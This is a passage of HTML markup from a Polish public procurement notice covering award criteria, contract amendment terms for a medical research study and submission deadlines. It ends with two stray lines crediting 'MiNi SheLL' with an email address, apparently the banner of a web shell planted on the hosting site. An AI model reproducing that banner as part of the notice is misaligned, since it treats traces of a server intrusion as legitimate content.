collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie Kierownika Zespołu Interpretatorów</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.Istotne zmiany do postanowień niniejszej Umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, są możliwe jedynie w przypadku spełnienia przynajmniej jednej z poniższych przesłanek:a)istotnej zmiany treści umowy nr INNOMED/I/14/NCBR/2014 zawartej pomiędzy Zamawiającym a NCBR;b)zmiany obowiązującego prawa, w zakresie zasad prowadzenia eksperymentów medycznych lub w innym zakresie, w jakim modyfikacji ulegną obowiązki związane z prowadzeniem Badań.c)zmiany liczebności poszczególnych grup badanych A/B/C, przy czym łączna liczba Uczestników Badania i cena za wykonanie Badania nie przekroczy kwoty brutto, wskazanej w ofercie na warunkach opisanych w pkt. 4 SOPZ.d)zmiany, postanowień umowy w tym zmian istotnych w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy - pod warunkiem wyrażenia zgody przez Zamawiającego tj. zmiany terminu realizacji umowy, o którym mowa w § 6 ust 1 wywołanej wystąpieniem siły wyższej mającej bezpośredni wpływ na terminowość usługi. Siła wyższa, o której mowa to zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych, którego strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogły przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej umowy albo mającej bezpośredni wpływ na terminowość usługi. Strony za okoliczności siły wyższej uznają: ogłoszone stany klęski żywiołowej, w tym powódź i trzęsienie ziemi, upadek statku powietrznego, strajki generalne lub lokalne, działania wojenne lub ogłoszenie stanu wojennego, atak terrorystyczny,e)zmian korzystnych dla Zamawiającego.2.Zmiany postanowień umowy związane ze:a)zmianą danych identyfikacyjnych (w tym adresowych i teleadresowych) strony umowy i osób reprezentujących strony (w szczególności z powodu nieprzewidzianych zmian organizacyjnych, choroby, wypadków losowych);b)zmianą numerów rachunku bankowego Wykonawcy wskazanego w niniejszej umowie, c)wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści niniejszej umowy, d)zmianą w KRS, wpisie do CEIDG w trakcie realizacji zamówienia dotyczące Wykonawcy,e)zmianą postanowień umowy wskutek zmiany przepisów prawa Unii Europejskiej lub prawa krajowego,f)zmianą terminu wykonania zamówienia wskutek wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego, w tym w szczególności wstrzymanie realizacji umowy,3.Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa w ust. 1. Wniosek o zmianę postanowień niniejszej umowy musi być wyrażony na piśmie.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-07-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com